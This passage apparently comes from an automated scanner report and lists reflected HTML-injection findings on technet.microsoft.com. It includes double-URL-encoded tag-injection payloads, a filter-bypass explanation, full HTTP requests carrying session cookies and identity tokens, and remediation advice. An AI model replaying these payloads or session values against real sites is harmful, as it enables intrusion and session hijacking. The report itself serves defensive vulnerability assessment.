<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5c0ed"><a>31abbdfd032/bb727091" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35bc4%2522%253e%253ca%253edfa7e72bc0e was submitted in the REST URL parameter 3. This input was echoed as 35bc4"><a>dfa7e72bc0e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727091.aspx35bc4%2522%253e%253ca%253edfa7e72bc0e HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:20:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727091.aspx35bc4"><a>dfa7e72bc0e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80cf1%2522%253e%253ca%253e388be4a0e2f was submitted in the REST URL parameter 1. This input was echoed as 80cf1"><a>388be4a0e2f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:50:27 GMT Content-Length: 10175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us80cf1"><a>388be4a0e2f/library/bb727099" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce54%2522%253e%253ca%253e94c65e280b2 was submitted in the REST URL parameter 2. This input was echoed as 5ce54"><a>94c65e280b2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:50:59 GMT Content-Length: 10175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5ce54"><a>94c65e280b2/bb727099" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95e2f%2522%253e%253ca%253eca85967eeac was submitted in the REST URL parameter 3. This input was echoed as 95e2f"><a>ca85967eeac in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:51:31 GMT Content-Length: 10186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727099.aspx95e2f"><a>ca85967eeac" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4139%2522%253e%253ca%253e35360230e6 was submitted in the REST URL parameter 1. This input was echoed as e4139"><a>35360230e6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-use4139%2522%253e%253ca%253e35360230e6/library/bb727159.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10198 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:26 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use4139"><a>35360230e6/library/bb727159" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a18%2522%253e%253ca%253e8384bc7b34d was submitted in the REST URL parameter 2. This input was echoed as 17a18"><a>8384bc7b34d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library17a18%2522%253e%253ca%253e8384bc7b34d/bb727159.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:33 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library17a18"><a>8384bc7b34d/bb727159" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3036%2522%253e%253ca%253ec8fce23daed was submitted in the REST URL parameter 3. This input was echoed as f3036"><a>c8fce23daed in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727159.aspxf3036%2522%253e%253ca%253ec8fce23daed HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:40 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727159.aspxf3036"><a>c8fce23daed" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f8c%2522%253e%253ca%253e77dc383cfad was submitted in the REST URL parameter 1. This input was echoed as 12f8c"><a>77dc383cfad in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
